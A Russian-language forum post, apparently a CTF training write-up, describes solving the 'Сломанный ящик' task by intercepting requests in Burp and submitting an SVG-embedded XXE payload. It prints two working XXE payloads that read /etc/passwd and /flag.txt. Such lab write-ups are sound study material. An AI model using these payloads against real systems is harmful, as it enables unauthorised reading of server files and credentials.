Сломанный ящик [writeup] по таску

Kot_oo

One Level
03.04.2025
3
4
Добрый день коллеги, штурмуем задания из учебы, на этот раз "Сломанный ящик"

1.webp


Залетаем в задание и осматриваемся в нашем любимом burp
2.webp


Все как и положено включаем intercept, и штудируем запрос

Видим adoba и понимаем, что нам с ним работать.
Так же видим, что у нас используется кодировка URL в правом окне

3.webp


Честно скажу просидел достаточно долго раздумывая, никак не получалось XML заставить отработать,
P.S> мы ж легких путей не ищем
, но вспомнив про нагрузку в картинке из урока пошел за ней))
Достаем от туда код

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns=" " xmlns:xlink=" " version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

И пробуем подкинуть в burp с одинарной кодировкой и вуаля мы получаем passwd, далее меняем код (расширяем значение картинки и берем место положения "/flag.txt" из задания и получаем >

(ЗАБЕГАЯ ВПЕРЕД по случаю "мы ж легких путей не ищем"!!!! ДАННЫЙ КОД РАБОТАЕТ ПРОСТО ЕСЛИ ЕГО ВСТАВИТЬ В ФОРМУ!!!!!!! НА СТРАНИЦЕ)

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "/flag.txt" > ]>
<svg width="1000px" height="1000px" xmlns=" " xmlns:xlink=" " version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Вот и получаем флаг. Оказалось все намного проще, чем мог себе представить. (от использования двойной кодировки, change requests method (кстати возьмите на заметку, если в запросе xml не прослеживается) и заканчивая expect :D)
4.webp


Сильно не ругайте, критика принимается)

И коллеги помните!!!! «Не стыдно не знать, стыдно не учиться» — русская пословица.
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!